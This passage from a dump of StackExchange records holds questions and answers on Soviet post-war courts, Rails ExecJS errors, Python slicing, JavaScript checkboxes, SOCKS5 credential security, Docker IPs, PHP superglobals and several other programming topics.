\"\u0417\u0430\u043f\u0438\u0441\u043a\u0438 \u0430\u0434\u0432\u043e\u043a\u0430\u0442\u0430\"](http:\/\/imwerden.de\/pdf\/kaminskaya_zapiski_advokata_2009.pdf) contains 2 major episodes: a criminal and a political. The author was the defender in both cases. Breathtakingly interesting.\nAnswer: Criminal justice in USSR in the post war period was performed by \"People's Courts\" (they existed in 1937-1989). They consisted of judges and \"people's jury\". The judges were elected by popular vote for the term of 5 years. The jurors were elected for 2 years by meetings of \"labor collectives\" (factories an other enterprises). All elections in Soviet Union were strictly controlled by the Communist party, so usually 99.9% voted for a single candidate proposed by CPSU.\nThere was no such notion as \"independent court\", even in theory. 
The system of justice was \"a branch of the government\". In addition to this, all aspects of life and all institutions in the USSR, including the government and the justice system, were strictly controlled by the CPSU, and this was written into the constitution. \nSuperficially, the process looked much as it does in democratic courts: there was an accuser and a defender, the judge presided, and the jurors made the decision by vote. In some cases the jurors were not used and the judge made the decision him\/herself.\nThere was also a variety of other courts: \"Comrades' courts\", tribunals, etc.\nBut the usual criminal cases were handled by the People's courts.\nIn the period immediately after WWII, an enormous number of people were imprisoned in camps or exiled without any court hearings, for alleged \"collaboration with the enemy\" or for waging war against Soviet power. (Whole nations were deported, and\nother nations decimated). In most cases, armed resistance against Soviet power was qualified simply as \"banditism\", but it was not handled by any courts.\nMost of the camp population in the late 40s consisted of these people, though ordinary crime rates were also very high.\nTorture was not officially permitted after WWII, but in fact it was widely used.\nEven in the 1980s, beating by police was a routine \"investigation procedure\". Very few people dared to complain.\nThe death penalty was abolished in 1947, but in 1950 it was re-introduced for \"spying and high treason\". 10 years later people were sentenced to death for\n\"illegal currency transactions\". So the state did not respect its own laws. But in any case, the death penalty was very rare in comparison with the 1930s. \nSee, for example, http:\/\/lawbook.online\/gosudarstva-prava\/organyi-yustitsii-sud-prokuratura-29805.html\nSorry, it is in Russian.\nComment: @Felix Goldberg: I disagree. The whole idea of \"separation of powers\" was totally foreign to the Soviet system, even in theory. Justice was just a branch of the state. There was no authority except the state. This is why the system is called \"totalitarian\".\nComment: Can you provide any sources?\nComment: My answer was based on my own experience (I lived in the USSR from the middle 50s till the late 80s), on many Soviet books and newspapers that I read in this period, but you can check everything I said using Russian Wikipedia, or by typing \"Criminal Justice in USSR\" into Google.\nComment: @Alex With due respect, I think you are wrong here. The judiciary is a branch of the state everywhere, by definition. The question is whether the executive branch can control the operation of the judiciary. There is no argument that in practice the Soviet courts were subservient to the party. But in theory, on the level of constitutional platitudes, they had about the same status as their counterparts in free countries.\nComment: +1 overall but I think you might be wrong on one point: the courts were considered independent *in theory*.\nComment: The 6th article of the constitution, which guaranteed the CPSU all control, was introduced in 1977. It was not in the 1936 constitution.\nComment: @Alex I tracked it down for you. Article 112 of the 1936 Constitution says: \"Статья 112. Судьи независимы и подчиняются только закону.\" (http:\/\/www.hist.msu.ru\/ER\/Etext\/cnst1936.htm#9) This is about as clear as it gets... 
[Translation: \"The judges are independent and only obey the law.\"]\n","meta":{"source":"history.stackexchange","title":"How did a criminal trial in the Soviet Union work after World War 2?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Ruby on Rails ExecJS::RuntimeError in Pages#home\n\nQuestion: I generated a page using a controller. But when I go to the localhost:3000\/pages\/home. I got this error:\nExecJS::RuntimeError in Pages#home\n@RyanBigg Okay here is the full error code:\nExecJS::RuntimeError in Pages#home\n\nShowing C:\/Users\/Anishka\/Desktop\/test\/myfirstapp\/app\/views\/layouts\/application.html.erb where line #6 raised:\n\n (in C:\/Users\/Anishka\/Desktop\/test\/myfirstapp\/app\/assets\/javascripts\/pages.js.coffee)\nExtracted source (around line #6):\n\n3: \n4: Myfirstapp<\/title>\n5: <%= stylesheet_link_tag \"application\", :media => \"all\" %>\n6: <%= javascript_include_tag \"application\" %>\n7: <%= csrf_meta_tags %>\n8: <\/head>\n9: <body>\nRails.root: C:\/Users\/Anishka\/Desktop\/test\/myfirstapp\n\nApplication Trace | Framework Trace | Full Trace\napp\/views\/layouts\/application.html.erb:6:in `_app_views_layouts_application_html_erb__601430158_32305500'\nRequest\n\nParameters:\n\nNone\nShow session dump\n\nShow env dump\n\nResponse\n\nHeaders:\n\nNone\n<\/code>\nI found a solution from here ExecJS::RuntimeError on Windows trying to follow rubytutorial\nwhich is: \n\nThe Fix that worked for us: On the system having issues, find ExecJS's\n runtimes.rb file. It looks like this. Make a copy of the found file\n for backup. Open the original runtimes.rb for editing. Find the\n section that starts with the line JScript = ExternalRuntime.new(. In\n that section, on the line containing :command => \"cscript \/\/E:jscript\n \/\/Nologo \/\/U\", - remove the \/\/U only. Then on the line containing\n :encoding => 'UTF-16LE' # CScript with \/\/U returns UTF-16LE - change\n UTF-16LE to UTF-8 . Save the changes to the file. This section of the\n file should now read:\nJScript = ExternalRuntime.new(\n :name => \"JScript\",\n :command => \"cscript \/\/E:jscript \/\/Nologo\",\n :runner_path => ExecJS.root + \"\/support\/jscript_runner.js\",\n :encoding => 'UTF-8' # CScript with \/\/U returns UTF-16LE ) Next, stop then restart your Rails server and refresh the page in your\n browser that produced the original error. Hopefully the page loads\n without error now.\n\nBut where is the runtimes.rb file? I could not find anything like that. I'm rails beginner and your help will be appreciated, thanks. \nComment: ExecJS supports these runtimes:\n\n ` therubyracer - Google V8 embedded within Ruby\n therubyrhino - Mozilla Rhino embedded within JRuby\n Node.js\n Apple JavaScriptCore - Included with Mac OS X\n Microsoft Windows Script Host (JScript)`\nComment: did you install `therubyracer` gem\nComment: Please show us the full error message. You're missing a part of it from your post.\nComment: Hello, I'm using a simple package from here http:\/\/railsinstaller.org\/en\n\napart from that I've not installed anything else.\nComment: @RajarshiDas I'm using rails installer. It comes with all the things, I guess. but therubyracer gem is required? and how can I check if I've already installed that gem in my system? thanks.\nComment: @RyanBigg I posted the full error code above.\nComment: do cd rails_app && `bundle show therubyracer` or `gem list therubyracer`\nComment: @RajarshiDas you mean go to my app directory from cmd and then type bundle show therubyracer, right? 
I did that and it says: Could not find gem 'therubyracer'.\n\nAre you sure, I need that gem in my system? If yes, then how can I install it?\n\nAlso, where the gems stored? in folders? or they are stored in my app only?\n\nThanks for your help, I really appreciate it.\nComment: thats mean you did not install the rubyracer which will require please follow https:\/\/github.com\/hiranpeiris\/therubyracer_for_windows\nComment: @RajarshiDas I installed it using cmd but there is one more step, it says Copy v8.dll & v8preparser.dll in to ruby\\bin folder. Where is the ruby\/bin folder? I checked my app folders, it's not there!\nComment: @RajarshiDas I copied those dll files to C:\/Rails Installer\/Ruby\/bin folder. When I enter \"bundle show therubyracer\" it shows the same message - could not find gem. And when I use \"gem list therubyracer\" it shows this: *** LOCAL GEMS ***\n\ntherubyracer (0.11.0beta1 x86-mingw32)\n \nI stopped the rails server by using Ctrl+C and started again, refreshed the page but still shows the same error!\nComment: app\/assets\/javascripts\/ Please change the page extension pages.js.coffee to page.js.jsx\nAnswer: You need to change the command line ExecJS uses for cscript. This can be done in the gem's runtimes.rb file. For me, this was located in:\n\nC:\\Ruby200-x64\\lib\\ruby\\gems\\2.0.0\\gems\\execjs-2.0.2\\lib\\execjs\n\nNaturally, that'll be different depending on your version of Ruby and where it's installed.\nI found this workaround in a thread for an ExecJS issue.\nI changed this:\n<code>JScript = ExternalRuntime.new(\n :name => \"JScript\",\n :command => \"cscript \/\/E:jscript \/\/Nologo \/\/U\",\n :runner_path => ExecJS.root + \"\/support\/jscript_runner.js\",\n :encoding => 'UTF-16LE' # CScript with \/\/U returns UTF-16LE\n)\n<\/code>\nto this:\n<code>JScript = ExternalRuntime.new(\n :name => \"JScript\",\n :command => \"cscript \/\/E:jscript \/\/Nologo\",\n :runner_path => ExecJS.root + \"\/support\/jscript_runner.js\",\n :encoding => 'UTF-8' # CScript with \/\/U returns UTF-16LE\n)\n<\/code>\nThis screenshot is also from that thread:\n","meta":{"source":"stackoverflow","title":"Ruby on Rails ExecJS::RuntimeError in Pages#home","dup_signals":{}},"subset":"stackexchange"} +{"text":"Returning a sliced list\n\nQuestion: I am stuck on this question:\n\nWrite a function <code>lossy_merge(list_1, list_2)<\/code> that returns a new list\n containing all the elements of <code>list_1<\/code> except the last followed by all\n the elements of <code>list_2<\/code> except the first. \nYou may assume that both\n <code>list_1<\/code> and <code>list_2<\/code> contain at least one element. \n\nFor example:\nTesting the following:\n<code>ans = lossy_merge([10, 20, 30], [100, 200, 300])\n\nprint(ans) \n<\/code>\nShould give me: <code>[10, 20, 200, 300]<\/code>\nThe function I currently have: \n\n<code>def lossy_merge(list_1, list_2):\n \"\"\"returns list\"\"\"\n list1 = list_1[0:2]\n list2 = list_2[1:3]\n return list1 + list2<\/code>\n\nGives me <code>[10,20,200,300]<\/code> however, when testing with other ones like: \n<code>ans = lossy_merge([10], ['rhubarb'])\n\nprint(ans)\n<\/code>\nI get <code>[10]<\/code> instead of the expected <code>[]<\/code> \nWhat am I doing wrong? \nSorry, I'm new to Python 3 programming :\/\nAnswer: Slice the first list up to but not including the last item, slice the second starting at the second item up to the end of the second list. 
Remember the last item is index -1 and the second item is index 1 because counting in Python starts at zero.\n<code>return list_a[:-1] + list_b[1:]\n<\/code>\n","meta":{"source":"stackoverflow","title":"Returning a sliced list","dup_signals":{}},"subset":"stackexchange"} +{"text":"showing Confirm message when unchecking a checkbox in javascript\n\nQuestion: I want a message that reads \"are you sure?\" to display when the user tries to uncheck a checkbox. If they choose something like \"yes\", then uncheck it. If they choose \"no\", then leave as is. I'm fairly new to JavaScript and my attempt at this has prompted me with the error \"JavaScript runtime error: Unable to get property 'checked' of undefined or null reference\". Here is my Checkbox code:\n<code><div id=\"ChkBox\">\n <input style=\"margin: 5px; \" type=\"checkbox\" name=\"chkIsActive\" onchange=\"Areyousure('ChkBox')\" value=\"@Model.Pharmacy.IsActive\" @(Model.Pharmacy.IsActive ==\"True\" ? \"checked=\\\"checked\\\"\" : \"\") \/> Is Active\n<\/div>\n<script>\n Areyousure();\n<\/script>\n<\/code>\nand here is the function: \n<code>function Areyousure(id) {\n if (document.getElementById(id).checked == true) {\n return false;\n } else {\n var box = confirm(\"Are you sure you want to Uncheck this?\");\n if (box == true)\n return true;\n else\n document.getElementById(id).checked = true;\n }\n}\n<\/code>\nWhat can i do to fix this? Thanks in Advance!\nComment: I don't see any c#\/.NET related thing here.\nComment: Yea, sorry I was trying to add as many tags to try to get help faster. I'm new to this site.\nComment: @julianc Adding inappropriate tags often has the opposite result. People who find the question by *those* tags may downvote your question or vote to close.\nAnswer: You could consider passing in the element itself to avoid any issues with targeting it based on its <code>id<\/code> attribute using :\n<code>onchange='Areyousure(this);'\n<\/code>\nAnd then adjust your function accordingly to handle determine if the <code>checked<\/code> attribute should persist through the change or not :\n<code>function Areyousure(element) {\n \/\/ If it is checked now, let it be\n if (element.checked) {\n return false;\n \/\/ Otherwise prompt the user\n } else {\n \/\/ Prompt the user to make sure\n if (confirm(\"Are you sure you want to Uncheck this?\")){\n \/\/ The user confirmed it, so uncheck it\n return true;\n }else{\n \/\/ Otherwise, keep it checked\n element.checked = true;\n } \n }\n}\n<\/code>\nExample\n\n<code><div id=\"ChkBox\">\n <input style=\"margin: 5px; \" type=\"checkbox\" name=\"chkIsActive\" onchange=\"Areyousure(this)\" value=\"example\" checked \/>Is Active\n<\/div>\n<script>\n function Areyousure(element) {\n \/\/ If it is checked now, let it be\n if (element.checked) {\n return false;\n \/\/ Otherwise prompt the user\n } else {\n \/\/ Prompt the user to make sure\n if (confirm(\"Are you sure you want to Uncheck this?\")){\n \/\/ The user confirmed it, so uncheck it\n return true;\n }else{\n \/\/ Otherwise, keep it checked\n element.checked = true;\n } \n }\n}\n<\/script><\/code>\nComment: Thank You! One last thing though...the message pops up as soon as the page loads. How can I prevent this?\nComment: You are currently explicitly calling it via ``. Removing that should resolve it.\nComment: Got it! 
Thanks for everything.\nAnswer: Your method expects an ID but none is passed in:\nAdd to your input:\n<code><input id=\"chkIsActive\"\n<\/code>\nAnd change the script to call method to:\n<code><script>\n Areyousure(\"chkIsActive\");\n<\/script>\n<\/code>\nAnswer: Since you are finding the element by id (which is not defined), so javascript will not be able to find the html element.\nInstead you can edit your input tag to something like this;\n<code><input style=\"margin: 5px; \" type=\"checkbox\" name=\"chkIsActive\" onchange=\"Areyousure()\" value=\"@Model.Pharmacy.IsActive\" @(Model.Pharmacy.IsActive ==\"True\" ? \"checked=\\\"checked\\\"\" : \"\") \/>\n<\/code>\nAnd then instead of getting the element by Id, you can get it by name using:\n<code>document.getElementByName(\"chkIsActive\");\n<\/code>\nYou also need to change the function as no parameter will be passed to the function now.\nCheers :)\n","meta":{"source":"stackoverflow","title":"showing Confirm message when unchecking a checkbox in javascript","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to prevent aborting of thread due to app termination?\n\nQuestion: If a routine is running periodically by way of a <code>System.Threading.Timer<\/code>, what can be done to prevent this routine from being aborted mid-way due to the termination of the host application?\nComment: The timer is owned by the application; if the application terminates, so goes the timer. If your app is shut down gracefully, you could signal to the timer routine to clean up, but if someone force-aborts the app, there's not much you can do.\nComment: @Joe: would be there some way to allow the timer thread to carry on with its current iteration and then terminate?\nComment: @CJ7: if a part of application is not finished, the application is not finished too, by definition.\nComment: @Vlad: whether the application is technically 'finished' is not my concern. What I need is to prevent the timer routine from being interrupted because it may not complete necessary database updates etc. I don't mind if this runs on after the host app appears to have terminated.\nComment: What if someone pulls the plug? You should be prepared for the possibility that things terminate before everything you expect to finish, finish. In the normal termination case, you should be able to signal your timer thread to wrap things up immediately.\nComment: See http:\/\/stackoverflow.com\/a\/9062414\/327528\nAnswer: Well, you cannot possibly do anything if the application is terminating; however you can prevent the implicit application termination by exit from <code>main<\/code> (closing the main window, etc.) if you open a non-background thread.\nYou can make the timer to run at that thread, however you cannot do it with <code>System.Threading.Timer<\/code>, as it runs on thread pool threads (which are background ones). You can e. g. start a dispatcher on that thread and run a <code>DispatcherTimer<\/code> (if you are using WPF).\nAnswer: This code should cause the main thread to block for 10 seconds waiting for any queued timer callbacks to finish. This can be run at the exit point of the host application.\n<code>Dim waitHnd As WaitHandle = New AutoResetEvent(False)\nTimer1.Dispose(waitHnd)\nwaitHnd.WaitOne(10000)\n<\/code>\nAnswer: There is no way to guarantee that your thread won't be terminated abnormally. 
Any number of things can go wrong: an unexpected power failure, user terminating the application with Task Manager, or a bug in your program that crashes the thread are just three possibilities.\nIf you're doing a multi-stage database update that, if interrupted, would leave your database in a corrupted or inconsistent state, then you should be using transactions.\n","meta":{"source":"stackoverflow","title":"How to prevent aborting of thread due to app termination?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I change image and after rerunning the main activity in the thread after 5 sec not go back to the basic layout in android\n\nQuestion: So I am creating an app where I get the string from my <code>AsyncTask<\/code> which I have created as a subclass in my <code>MainActivity<\/code> class in order to get the variables I receive from the internet. And according to variables I get I change the images accordingly after every 5 seconds. Now the task is successful but on activity refresh I keep getting the default layout I created in <code>activity_main.xml<\/code> and again it changes to the one I want. \nPosting my code below.\n<code>Thread thread = new Thread() { \/\/thread I am running every 5 secs\n @Override\n public void run() {\n try {\n synchronized (this) {\n wait(5000);\n syncapp sa = new syncapp(); \/\/AsyncTask to get String from Internet\n sa.execute();\n }\n } catch (InterruptedException e) {\n e.printStackTrace();\n }\n Intent mainActivity = new Intent(getApplicationContext(), MainActivity.class); \/\/Creating intent to restart the activity (Need a workaround if possible)\n startActivity(mainActivity);\n }\n\n ;\n };\n thread.start();\n\n}\npublic void setImage(String str) \/\/Function I will call to change Image\n {\n vacancy =0;\n b = a.toCharArray();\n for (int i = 0; i < 6; i++)\n if (b[i] == '0'){\n iv[i].setImageResource(R.drawable.img2);\n vacancy++;}\n else if (b[i] == '1') {\n iv[i].setImageResource(R.drawable.img1);\n }\n Log.i(\"abc \", a);\n tv.setText(\"InBackGround\" + str);\n }\nprotected void onSaveInstanceState(Bundle outState) {\n super.onSaveInstanceState(outState);\n \/* for(int i =0;i<6;i++) {\n outState.putChar(\"imv\"+(i+1), b[i]);\n }*\/\n outState.putString(\"a\",a); \/\/Getting a from the internet (php file)\n Log.i(\"Saved State\", \"Activity A - Saving instance state\");\n}\n<\/code>\n\nNow what I want is if you have a better method to do this thing. Eg. In a Stock market application the prices keep on changing. The same way I want my image to change according to the data I get.\nIf this is the only method then how do I save changes I make\n(eg. like in the code above <code>setImageResource<\/code> to img2) permanently.\nIf I can use something else ImageView.\n\nI have already used <code>onSaveInstanceState<\/code> But as I am taking values from the internet I don't know I am not able to use them.\nAnswer: So first of all.. when working with UI elements such as Views, Widgets, you would want to avoid spawning your own threads, as View can be touched only from the thread it was created from. \nSecond.. you would also want to avoid sleeping inside your worker thread - basically just use the Handler class (from android.os) and post a delayed Runnable, like so: https:\/\/stackoverflow.com\/a\/20784353\/2102748. 
Just be sure to stop all work on that particular handler when your Activity stops, like so: https:\/\/stackoverflow.com\/a\/3627399\/2102748\nThird - you should perhaps load the photo immediately (on the same AsyncTask or thread) if that is the only thing you need, but be sure to post the \"set bitmap to view\" work to the handler you created.\nHope this helps.\n","meta":{"source":"stackoverflow","title":"How do I change image and after rerunning the main activity in the thread after 5 sec not go back to the basic layout in android","dup_signals":{}},"subset":"stackexchange"} +{"text":"Are SOCKS5 credentials safe during authentication on proxy server\n\nQuestion: I've read several tutorials, but I'm still not totally sure.\nIf I set up my own SOCKS5 proxy server on a VPS and configure it to use a username and password, will these credentials be safe during authentication on the proxy over public wi-fi, for example?\nIf not, how does this work for paid proxy providers?\nI know about VPN and SSH-tunneling, but I think they are too complicated to use on mobile devices and they also lead to additional power consumption for keeping connections alive.\nAnswer: Neither traffic nor credentials are encrypted in the SOCKS5 protocol. From RFC 1929:\n\nThis document describes a subnegotiation that provides authentication services to the SOCKS protocol. Since the request carries the password in cleartext, this subnegotiation is not recommended for environments where \"sniffing\" is possible and practical.\nComment: Is it not possible to use SSL\/TLS with SOCKS, like it is possible to do with FTP? Otherwise if you own the SOCKS proxy, an alternative is to allow only authentication from your own IP address and run the SOCKS proxy server only when needed (to limit risks of unauthorized access in case someone on the same local or mobile network uses the same IP address as you). Another solution which could be combined would be to create a temporary random password that is invalidated after login (in case it is intercepted on a local network) but I had to do a request every 30 seconds to keep connection alive.\nComment: @baptx You could certainly encase it in TLS, but then it'd no longer be SOCKS.\nAnswer: SOCKS5 is a transport protocol and by itself it is not encrypted. Requests transmit the credentials in plain text, which is considered a security bad practice.\nVPN software on a mobile phone would be the easiest alternative to consider, in my opinion. Just enable the VPN whenever you need it.\n","meta":{"source":"security.stackexchange","title":"Are SOCKS5 credentials safe during authentication on proxy server","dup_signals":{}},"subset":"stackexchange"} +{"text":"Zend_Tool multiple .zfproject.xml\n\nQuestion: I need to create a custom folder layout to hold multiple applications and get Zend_Tool working with it:\n<code>applications \n|- frontend\n |- configs\n |- controllers\n |- models\n |- tests\n |- views\n |- .zfproject.xml\n |- Bootstrap.php\n|- backend\n |- configs\n |- controllers\n |- models\n |- tests\n |- views\n |- .zfproject.xml\n |- Bootstrap.php\nsystem\npublic\ndocs\n<\/code>\nHow can I get this?\nAnswer: Use the <code>create module<\/code> command:\n<code>zf create module frontend\nzf create module backend\n<\/code>\nAfter that, your folder structure will be the following. 
\n<code>applications\n configs \n controllers \n models \n modules \n |- frontend\n |- configs\n |- controllers\n |- models\n |- tests\n | - views \n |- Bootstrap.php\n |- backend\n |- configs\n |- controllers\n |- models\n |- tests\n |- views \n |- Bootstrap.php\n views \nsystem\npublic\ndocs\n<\/code>\nI think it is a good structure for a project. Also, you can use the default module as a front end or backend.\n","meta":{"source":"stackoverflow","title":"Zend_Tool multiple .zfproject.xml","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to assign multiple static IPs to docker container\n\nQuestion: I am able to run a docker container and assign one static IP using this command\n<code>docker run -it --name container1 --net ProdNetwork --ip 10.1.1.100 centos:latest \/bin\/bash\n<\/code>\nI couldn't figure out how to assign multiple static IPs to one container. Can someone help? \nAnswer: That was requested before.\nOne possible solution\/workaround is to deploy 3 containers:\n\n2 NGiNX containers, each with their own static IP, reverse-proxying to the third container (see \"nginx redirect to docker container\")\nyour third container, with its own internal private IP with a swarm network, which will receive the queries addressed to one of the two other NGiNX containers.\n\nThis might be more straightforward than trying to add another network route to a given container.\nComment: @user1550159 \" maintenance becomes very hard\": not necessarily: https:\/\/github.com\/jwilder\/nginx-proxy\nComment: Thanks VonC, I saw the nginx workaround, but my scenario is to host at least 15 SSL sites on a Windows container. Routing through a reverse proxy to that many sites is complex and maintenance becomes very hard.\nComment: @user1550159 In the same idea: traefik: https:\/\/github.com\/containous\/traefik (https:\/\/medium.com\/@lukastosic\/traefik-docker-reverse-proxy-and-much-much-more-a39b24b9d959)\nAnswer: Spin up a new Windows container (I used Nano Server) and run the following command in the container shell to add multiple static addresses:\n<code>New-NetIPAddress \u2013InterfaceIndex 2 \u2013IPAddress 172.31.2.3 -PrefixLength 24\n<\/code>\nReference:\nhttps:\/\/forums.docker.com\/t\/how-to-host-multiple-websites-with-different-ip-s-in-iis-container\/46985\/4\n","meta":{"source":"stackoverflow","title":"How to assign multiple static IPs to docker container","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP $_GET\/$_POST via variable variables\n\nQuestion: I'm attempting to dynamically access both the $_GET and $_POST arrays, among others, using variable variables. The reason I'm trying to do this is so that I can perform similar actions on multiple arrays without needing to declare specific iterations for each. I'm reasonably sure this is possible, as PHP's documentation says it is able to use variable variables to dynamically access an array, however I'm unable to get it to work. A simple demonstration is when I'm attempting to verify that a certain property has been set.\n<code>if(isset(${$this->_array}[$property])) { return ${$this->_array}[$property]; }\nelse { return null; }\n<\/code>\nWhen I run the above script I always get null, however when I statically seek the desired property, manually using $_GET or $_POST, I get the desired outcome. I have triple checked <code>$this->_array<\/code> and <code>$property<\/code> and they are returning the correct string values. 
Are these arrays unavailable for such access, or am I doing something wrong?\nComment: http:\/\/en.wikipedia.org\/wiki\/Code_smell\nComment: @ceejayoz: OK? Heard of it before, familiarized myself with the concept. What are you trying to say? That my code is wrong somewhere else? I've already determined that the variables being passed to the above statement are correct. Not sure what else it could be.\nComment: I'm trying to say that using variable variables is usually a sign that you're doing something wrong. There's almost always a better way that won't make subsequent developers want to kill you.\nComment: Alright, I didn't realize variable variables were such taboo, this was my first experience with them. I'll be sure to keep them out of future code :)\nAnswer: Superglobals (such as <code>$_POST<\/code>) can not be used as variable variables within functions.\nYou could say something like <code>$post = $_POST;<\/code> and then use <code>'post'<\/code> and it'd work, but directly using <code>'_POST'<\/code> won't.\nAnswer: Superglobals cannot be referenced as variable variables inside of classes or methods, so this will work:\n<code><?php\n$var = \"_GET\";\nprint_r(${$var});\n<\/code>\nBut this will not:\n<code><?php\ntest();\nfunction test() {\n $var = \"_GET\";\n print_r(${$var});\n}\n<\/code>\nI suspect that there is a better way to do what you are trying to accomplish.\nhttp:\/\/php.net\/manual\/en\/language.variables.superglobals.php#refsect1-language.variables.superglobals-notes\nComment: Not when not even this worked. I did try just printing the whole array, forgot to mention that. Thanks though\nComment: My code did work. I updated my answer to explain why it didn't work for you.\nAnswer: Whatever you're doing wrong, using variable variables is probably making it worse. For your own sanity, please stop. They should never be deployed in production code under any circumstances. They're impossible to debug, and using them in your code is like trying to read something that someone else wrote with their feet. If they have particularly dexterous feet, then perhaps you can understand what they're doing. But 99.9999% of the time, it is better to just use normal arrays.\nThat being said, try <code>$_REQUEST<\/code> instead.\nAnswer: There's already an array that contains both <code>$_GET<\/code> and <code>$_POST<\/code>. It's named <code>$_REQUEST<\/code>. Having said that, it can also contain the contents of <code>$_COOKIE<\/code> depending on the <code>request_order<\/code> setting, but the default is just <code>$_GET<\/code> and <code>$_POST<\/code>.\nAnswer: You say you want to access <code>both the $_GET and $_POST arrays, among others<\/code> -- what are these 'others'? You can use <code>$_REQUEST<\/code> to check the contents of <code>$_GET<\/code>, <code>$_POST<\/code>, and <code>$_COOKIE<\/code> all at once.\nAnswer: you can do this but dont know if it is a good coding practice\n<code>if( $_SERVER['REQUEST_METHOD'] == 'POST' ) {\n $method = '_POST';\n }\n else {\n $method = '_GET';\n }\n $data = $$method;\n<\/code>\nAnswer: You can create an associative array that references both arrays, and use that.\n<code>$params = [\n '_GET' => $_GET,\n '_POST' => $_POST\n];\n<\/code>\nThen you can use\n<code>return $params[$this->_array][$property] ?? 
null;\n<\/code>\n","meta":{"source":"stackoverflow","title":"PHP $_GET\/$_POST via variable variables","dup_signals":{}},"subset":"stackexchange"} +{"text":"Remove Underline on Hover\n\nQuestion: I've tried everything I could to remove the underline that appears when hovering over a product title on my Shopify. Any css suggestions as to how I can remove this underline anywhere that a product title appears?\nThank you!!!\nComment: Can you provide code or link to the issue?\nComment: Hey @MinalChauhan ! Right now it looks like the code that is on our Shopify's theme.scss for text links is: \n .text-link {\n display: inline;\n border: 0 none;\n background: none;\n padding: 0;\n margin: 0; }\n\n.text-link--accent {\n color: var(--color-btn-primary);\n border-bottom: 1px solid currentColor;\n padding-bottom: 1px; }\n .text-link--accent:not([disabled]):hover, .text-link--accent:focus {\n color: var(--color-btn-primary-focus); }\nAnswer: <code>**Try these two**\n\na:link {\n text-decoration: none;\n}\n\na:hover {\n text-decoration: underline;\n}\n<\/code>\nComment: hm for some reason that didn't seem to work, i tried something like that earlier and it still wouldn't budge\nAnswer: Yeah. I had encountered this issue before. Just use below code snippet:\n<code>.site-nav__link:hover span.site-nav__label { border-bottom: none; }<\/code>\nFrom my code snippet. Just replace it with your div\nComment: i just replaced my div with that code snippet but it didn't seem to change the underline when you hover. Is it possible to have this only function for a specific type of link, aka when you hover over a product title?\nComment: Yes. You just have to add a function for the hyperlink of that respective div of the product title. Still, if it has not worked just upload your code on codepen and share the link.\nComment: would it be enough to copy and paste the entire theme.css file on there for you to take a peak at it?\n","meta":{"source":"stackoverflow","title":"Remove Underline on Hover","dup_signals":{}},"subset":"stackexchange"} +{"text":"Changing input value while retaining original value\n\nQuestion: So I'm trying to do something that I don't necessarily think is the best practice from a UI standpoint(not by my choice) and change the value of the input after the user types it in. \nThe input field looks like this: \n<code><td><input type=\"text\" pattern=\"[0-9]*\" name=\"number1\" id=\"number1\" class=\"currency\"> \/ LUNA study<\/td>\n<\/code>\nand the JS to change it looks like this:\n<code> var number1 = strToNumber($(\"#number1\").val());\n var number1_calc = number1 +(calc_value * 0.1);\n\n $(\"#number1\").focusout(function(){\n $(\"#number1\").val(formatCurrency(Math.round(number1_calc)));\n });\n<\/code>\nThis portion of the code works how I want it to, the place I end up running into problems is when I need to use the calculated value for a different equation:\n<code>var number_total = number2 * number1_calc;\n<\/code>\nRight now I have the calculations setup to run on any change made in any input. So what ends up happening is after the focusout changes the value of the input, the next time the calculations are ran through it takes the new input value instead of the old. \nHere is a JSFiddle of what im trying to do. As you can see the number_total is updated on the change made to number_1 as soon as you enter something into number2, and this is what I want to stop.\nComment: how about a simplified js fiddle? 
looks to me like you should use jQuerys `change()` function\nComment: We could definitely use some more code here. As @Sionnach733 mentioned, you might want to use `$('#number1').on('change', function(){})` instead of `focusout()`\nComment: I just added a jsfiddle of my problem\nComment: Is this what you want http:\/\/jsfiddle.net\/hJ7jT\/2\/ ?\nAnswer: I'm not sure I understand your question\/scenario very well, but if you want to retain the originally entered value then you could use jQuery's .data() to associate that original value with the input element:\n<code>$('#number1').on('blur', function() {\n $(this).data('original-value', this.value);\n});\n<\/code>\nThen, in your calculation function that runs on changes to any input, reference <code>$('#number1').data('original-value')<\/code> instead of <code>.val()<\/code>.\nComment: Thanks for the advice, but I'm not sure if this will do the trick. Here is a [JSFiddle](http:\/\/jsfiddle.net\/fX9XE\/1\/) of the problem I'm experiencing. If you take a look you can see that it updates the total based on the changed number1 when I input something into number2, which I dont want it to do.\nComment: So, what you're saying is that calc_value should affect the display of number1, but should not affect the number_total?\nComment: Maybe, if you go through the form entering one at the time, you will see after entering calc_value and number1 the total_value displays the value I want. But then when you go to number2 and enter a value, total_value changes. This is because it is running through the change(function again and is recalculating number1_calc based on the changed number1 value.\nComment: Something like this is what I had in mind, using .data() to keep a hidden cache of the unmodified number1 value: http:\/\/jsfiddle.net\/fX9XE\/3\/\n","meta":{"source":"stackoverflow","title":"Changing input value while retaining original value","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plotting Partial Sums of Fourier Series\n\nQuestion: I'd like to plot some partial sums for a Fourier Series problem, but I am not sure if the output I am getting is correct. I want to be able to plot the partial sums and the function on the same graph. Here is something that I attempted.\n<code> s[n_, x_] := 8\/4 + 3\/(9 \u03c0) Sum[(6 (-1)^k)\/(k \u03c0) \n Cos[(k \u03c0 x)\/2] + (16 (-1)^k + 13)\/(\u03c0 k) \n Sin[(k \u03c0 x)\/2],{k, 0, n}]\n\n partialsums = Table[s[n, x], {n, 1, 5}];\n\n f[x_] = Piecewise[{{-x^3-2x,-2 < x < 0},{-1+x,0<= x <= 2}}]\n\n Plot[Evaluate[partialsums], {x, -4 Pi, 4 Pi}]\n<\/code>\nAny ideas about the best method to tackle something like this?\nComment: There's a k in the denominator of the sum (actually, two) and your index for k goes from 0 to n, so the sum is always indeterminate.\nComment: @DavidSkulsky: Should it be `{k,1,n}`. I actually only want to plot a certain amount of partial sums. Does this number go where the `n` is located?\nComment: Once you fix the sum, you should be able to plot what you want by just doing Plot[Append[partialsums,f[x]],{x,-4 Pi, 4 Pi}].\nAnswer: In the definition of <code>s<\/code> you're summing from <code>k==0<\/code>. Since the summand has a term <code>1\/k<\/code> this gives a divide-by-zero error when calculating the partial sums. The sum should in fact start from <code>k==1<\/code> (the zeroth coefficient is taken care of by the constant term in front of the sum). 
